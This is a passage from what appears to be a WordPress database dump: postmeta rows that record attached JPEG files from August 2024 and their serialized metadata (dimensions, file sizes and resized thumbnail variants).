(2576,923,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214228_0.jpg\";s:8:\"filesize\";i:633876;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214228_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20246;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214228_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173624;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214228_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9674;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214228_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105697;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214228_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:330514;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214228_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26481;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2577,924,'_wp_attached_file','2024/08/S__69214230_0.jpg'),
(2578,925,'_wp_attached_file','2024/08/S__69214229_0.jpg'),
(2579,924,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214230_0.jpg\";s:8:\"filesize\";i:685997;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214230_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20605;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214230_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184278;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214230_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9644;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214230_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111235;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214230_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:355899;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214230_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27006;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2580,925,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214229_0.jpg\";s:8:\"filesize\";i:631961;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214229_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20293;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214229_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173574;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214229_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9864;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214229_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105816;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214229_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:330513;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214229_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26730;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2581,926,'_wp_attached_file','2024/08/S__69214237_0.jpg'),
(2582,926,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214237_0.jpg\";s:8:\"filesize\";i:617584;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214237_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18809;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214237_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163865;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214237_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8973;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214237_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98646;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214237_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:317059;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214237_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24610;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2583,927,'_wp_attached_file','2024/08/S__69214239_0.jpg'),
(2584,927,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214239_0.jpg\";s:8:\"filesize\";i:646877;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214239_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17656;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214239_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163134;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214239_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8599;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214239_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96669;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214239_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324522;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214239_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22898;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2585,928,'_wp_attached_file','2024/08/S__69214240_0.jpg'),
(2586,929,'_wp_attached_file','2024/08/S__69214241_0.jpg'),
(2587,928,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214240_0.jpg\";s:8:\"filesize\";i:662395;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214240_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17623;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214240_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:166460;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214240_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8408;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214240_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98790;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214240_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:331136;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214240_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22978;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2588,929,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214241_0.jpg\";s:8:\"filesize\";i:680350;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214241_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17868;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214241_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:173716;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214241_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8277;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214241_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102342;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214241_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:344598;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214241_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23563;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2589,930,'_wp_attached_file','2024/08/S__69214242_0.jpg'),
(2590,930,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214242_0.jpg\";s:8:\"filesize\";i:793760;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214242_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18757;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214242_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199419;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214242_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9115;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214242_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116296;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214242_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:402481;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214242_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24874;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2591,931,'_wp_attached_file','2024/08/S__69214243_0.jpg'),
(2592,931,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214243_0.jpg\";s:8:\"filesize\";i:770384;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214243_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17117;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214243_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:185607;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214243_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7872;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214243_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:106929;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214243_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:380573;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214243_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22520;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2593,932,'_wp_attached_file','2024/08/S__69214245_0.jpg'),
(2594,932,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214245_0.jpg\";s:8:\"filesize\";i:648157;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214245_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15928;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214245_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:161656;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214245_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7704;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214245_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95136;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214245_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324288;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214245_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21116;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2595,933,'_wp_attached_file','2024/08/S__69214244_0.jpg'),
(2596,933,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1703;s:6:\"height\";i:961;s:4:\"file\";s:25:\"2024/08/S__69214244_0.jpg\";s:8:\"filesize\";i:634789;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214244_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16065;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214244_0-1024x578.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:159019;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214244_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7494;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214244_0-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94165;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214244_0-1536x867.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:317936;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214244_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21161;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2597,934,'_wp_attached_file','2024/08/S__69214235_0.jpg'),
(2598,934,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214235_0.jpg\";s:8:\"filesize\";i:686102;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214235_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19779;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214235_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:179407;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214235_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9450;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214235_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107319;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214235_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:349682;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214235_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25967;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2599,935,'_wp_attached_file','2024/08/S__69214238_0.jpg'),
(2600,935,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2024/08/S__69214238_0.jpg\";s:8:\"filesize\";i:618849;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__69214238_0-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18791;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__69214238_0-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:164209;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214238_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9030;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__69214238_0-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99064;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__69214238_0-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:318020;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__69214238_0-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24658;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2601,936,'_wp_attached_file','2024/08/S__69214248_0.jpg'),
